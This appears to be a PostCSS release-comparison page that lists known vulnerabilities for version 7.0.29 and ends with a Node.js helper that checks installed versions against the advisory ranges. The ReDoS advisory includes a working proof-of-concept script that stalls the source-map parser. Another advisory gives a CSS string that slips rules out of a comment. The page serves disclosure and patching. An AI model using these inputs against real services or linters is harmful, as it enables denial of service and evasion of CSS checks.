PostCSS version 7.0.29 is a minor increment over its predecessor, version 7.0.28; both are releases of the same tool for transforming styles with JavaScript plugins. The two versions share identical core dependencies: Chalk for coloured console output, Source Map for debugging, and Supports Color for terminal colour detection. The foundational details, such as the MIT license, the official Git repository, and authorship by Andrey Sitnik, are unchanged, and the Tidelift funding link is still present, reflecting the project's commitment to sustainability and long-term maintenance.
The main visible difference is in their dist attributes. Both versions comprise 38 files, but version 7.0.29 has a slightly larger unpacked size of 1,087,207 bytes compared to 1,087,166 bytes for version 7.0.28. This small size difference, combined with a release gap of approximately two days, suggests that version 7.0.29 contains minor bug fixes, performance improvements, or very small feature additions that do not fundamentally alter the API or core functionality. Developers should consult the project's changelog or commit history for precise details of these incremental changes. If you are using version 7.0.28 and are not experiencing a specific problem, you may not need to update. If a problem you want to solve is fixed in the new version, updating is recommended.
All vulnerabilities known to affect version 7.0.29 of the package
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regular expressions are caused mainly by the sub-pattern

    \/\*\s* sourceMappingURL=(.*)
    var postcss = require("postcss")

    // Build a stylesheet followed by n repeated "/*# sourceMappingURL=" openers
    // and no closing "*/", so the annotation regex has to backtrack across them.
    function build_attack(n) {
      var ret = "a{}"
      for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
      }
      return ret + "!"
    }

    // Warm-up parse of a well-formed source map annotation.
    postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

    // Parse progressively longer inputs and report how long each one takes;
    // a vulnerable version shows parse time growing super-linearly with length.
    for (var i = 1; i <= 500000; i++) {
      if (i % 1000 == 0) {
        var time = Date.now()
        var attack_str = build_attack(i)
        try {
          postcss.parse(attack_str)
          var time_cost = Date.now() - time
          console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
        } catch (e) {
          var time_cost = Date.now() - time
          console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
        }
      }
    }
Regular Expression Denial of Service in postcss
The npm package postcss, in versions from 7.0.0 up to but not including 7.0.36, and in 8.x versions before 8.2.10, is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters that use PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by `@font-face{ font:(\r/*);}` in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts which PostCSS parses as a CSS comment. After processing, those parts are included in the PostCSS output as CSS nodes (rules, properties) even though they were originally inside a comment.
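As an added example that is not code from the advisories or from the PostCSS project, the following Node.js helper turns the version ranges quoted in the three advisories above into a check that a dependency audit can run against the installed postcss version. The advisory labels, the function names and the command-line form are my own; the ranges are transcribed from the advisory text.

```javascript
// Added example: check a postcss version string against the affected ranges
// quoted in the advisories on this page. Not code from the advisories or from
// the PostCSS project; advisory labels and function names are assumptions.

// Parse "7.0.29" (optionally "v7.0.29-beta.1") into [major, minor, patch].
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error("not a semantic version: " + v);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Numeric comparison of two version strings: -1, 0 or 1.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Affected ranges as stated in the advisory texts above.
// Each range is [lower bound inclusive (null = none), upper bound exclusive].
const ADVISORIES = [
  {
    id: "ReDoS in lib/previous-map.js (getAnnotationURL/loadAnnotation)",
    ranges: [[null, "7.0.36"], ["8.0.0", "8.2.13"]],
  },
  {
    id: "ReDoS during source map parsing",
    ranges: [["7.0.0", "7.0.36"], ["8.0.0", "8.2.10"]],
  },
  {
    id: "line return (\\r) parsing discrepancy",
    ranges: [[null, "8.4.31"]],
  },
];

// True when version satisfies min <= version < max.
function inRange(version, range) {
  const [min, max] = range;
  if (min !== null && compareVersions(version, min) < 0) return false;
  return compareVersions(version, max) < 0;
}

// Return the ids of every advisory whose ranges cover the given version.
function affectedAdvisories(version) {
  return ADVISORIES
    .filter((a) => a.ranges.some((r) => inRange(version, r)))
    .map((a) => a.id);
}

// Smallest upper bound among all advisory ranges at which no advisory applies,
// i.e. the lowest listed fix version that clears every advisory on this page.
function firstCleanVersion() {
  const bounds = ADVISORIES.flatMap((a) => a.ranges.map((r) => r[1]))
    .sort(compareVersions);
  return bounds.find((b) => affectedAdvisories(b).length === 0) || null;
}

// Command-line use (CommonJS): node check-postcss.js 7.0.29
if (typeof require !== "undefined" && require.main === module) {
  const version = process.argv[2] || "7.0.29";
  const hits = affectedAdvisories(version);
  console.log(
    `postcss ${version}: ${hits.length ? hits.join("; ") : "no listed advisories apply"}`
  );
  console.log(`first version clear of all listed advisories: ${firstCleanVersion()}`);
}
```

Because the line-return advisory is stated as "before 8.4.31" with no lower bound, every 7.x release, including 7.0.36 which fixes both ReDoS issues, still matches it; the helper therefore reports 8.4.31 as the first version clear of all three, which is the practical upgrade target for anyone feeding untrusted CSS to PostCSS.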